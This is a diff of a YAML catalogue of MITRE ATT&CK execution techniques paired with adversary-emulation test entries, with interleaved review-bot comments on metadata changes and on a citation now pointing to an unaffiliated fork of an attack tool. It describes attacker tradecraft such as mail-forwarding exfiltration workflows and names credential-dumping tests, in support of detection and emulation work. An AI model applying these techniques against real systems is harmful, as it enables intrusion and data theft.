+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -54023,15 +54340,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -54048,7 +54369,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -54096,7 +54417,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -54129,7 +54450,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests:
- name: Radmin Viewer Utility
@@ -54239,7 +54559,7 @@ execution:
choco install -y 7zip
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -54300,8 +54620,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
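Review bot: the Github PSAttack reference now points at `https://github.com/Exploit-install/PSAttack-1` instead of the author's own `https://github.com/jaredhaight/PSAttack`, with a new retrieval date but the same author attribution. Linking a citation for an attack tool to an unaffiliated fork is a supply-chain concern for anyone who follows the reference and runs what they find; if the original repository is no longer available, an archive.org capture of it would be the safer target, and either way the change should be confirmed against the upstream ATT&CK data rather than accepted as a side effect of the import.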
@@ -54323,7 +54644,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests:
- name: Mimikatz
@@ -54872,7 +55192,7 @@ execution:
name: powershell
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -54950,9 +55270,8 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
@@ -55068,7 +55387,7 @@ execution:
name: sh
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -55126,7 +55445,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests:
- name: Create and Execute Bash Shell Script
@@ -55502,31 +55820,7 @@ execution:
elevation_required: true
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -55547,23 +55841,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests:
- name: Cobalt Strike Artifact Kit pipe
@@ -55721,6 +56036,70 @@ execution:
'
name: command_prompt
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
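Review bot: the new T1059.011 (Lua) entry lands after T1559 and before T1204.003, while the other T1059 sub-techniques in this file sit at T1059.001, T1059.004 and T1059.006, so the execution section is not ordered by technique ID. That is harmless for consumers that key on the `T1059.011:` mapping key, but it means future imports can shuffle entries and produce large diffs; emitting the section sorted by ID would keep the file stable. Also note `x_mitre_detection: ''` and `atomic_tests: []` here, consistent with the other empty entries (T1559.003, T1204, T1203), which all omit the `identifier:` key that entries with tests carry.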
@@ -55749,7 +56128,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
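Review bot: `modified` for T1204.003 regresses from `'2022-04-25T14:00:00.188Z'` to `'2021-08-26T16:42:35.318Z'`, the same day the Aqua Security citation was retrieved. A modified time moving back by eight months is a sign the import read a stale copy of this object; please check it against the current upstream ATT&CK object before merging.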
@@ -55776,8 +56155,6 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests:
- name: Malicious Execution from Mounted ISO Image
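Review bot: T1204.003 drops `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` but, unlike every other object in this diff, does not gain `x_mitre_attack_spec_version: 3.2.0`, and it is the only object here that keeps `x_mitre_permissions_required`. Together with the backwards `modified` timestamp in the preceding hunk this looks like an object regenerated from an older source; if the generator is meant to stamp 3.2.0 on everything, this entry is missing it.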
@@ -55800,24 +56177,8 @@ execution:
elevation_required: true
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
@@ -55834,9 +56195,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -55844,21 +56206,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
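Review bot: T1203 gains two data sources, `'File: File Modification'` and `'Network Traffic: Network Traffic Flow'`, while `x_mitre_version` is re-emitted unchanged at '1.4'. If anything in this repository uses `x_mitre_version` to decide whether a technique's detection mapping needs re-review, this change will be missed; it is probably worth diffing data sources as well as versions when triaging an import like this.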
@@ -55908,7 +56286,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests:
- name: Execute shell script via python's command mode arguement
@@ -56101,23 +56478,7 @@ execution:
name: sh
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -56128,32 +56489,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
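Review bot: x_mitre_permissions_required (User, Administrator, SYSTEM, root) is removed from T1569 and not re-added anywhere in the regenerated object, whereas every other removed key in this hunk (x_mitre_platforms, x_mitre_domains, id, type, created, created_by_ref, external_references, object_marking_refs) is re-inserted further down; confirm the field is gone upstream rather than lost by the generator, and if anything filters or labels tests by required permissions, update it in the same change. The x_mitre_version move from 1.2 to 1.3 and the new x_mitre_deprecated: false flag are consistent with a genuine upstream refresh.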
@@ -56196,7 +56569,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests:
- name: Create and Execute Batch Script
@@ -56375,7 +56747,7 @@ execution:
elevation_required: true
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -56432,11 +56804,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -56501,9 +56872,8 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests:
- name: Visual Basic script execution to gather local computer information
@@ -56611,7 +56981,7 @@ execution:
name: powershell
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -56632,14 +57002,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
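Review bot: the new description text cites (Citation: Cloud Hack Tricks GWS Apps Script) and (Citation: OWN-CERT Google App Script 2024); citations are resolved by exact source_name match, so the two strings must be byte-identical to the external_references entries added later in this object (they appear to be, but a trailing-space or hyphen difference would leave a dangling citation in the rendered page). Separately, x_mitre_attack_spec_version: 3.2.0 is inserted here between kill_chain_phases and x_mitre_contributors while the same key with the same value is deleted from the end of the object in a later hunk; a move with no value change only inflates the diff.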
@@ -56648,16 +57023,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
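Review bot: the platform rename from Office 365 to Office Suite changes how T1648 is bucketed by platform; any per-platform index or filter keyed on the literal string 'Office 365' needs to be regenerated or updated in the same change, otherwise this technique drops out of that view without any error. The x_mitre_version bump to 1.1 and the new OWN entry under x_mitre_contributors line up with the Google Workspace text added to the description.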
@@ -56683,6 +57060,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -56697,29 +57082,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -56732,25 +57098,41 @@ execution:
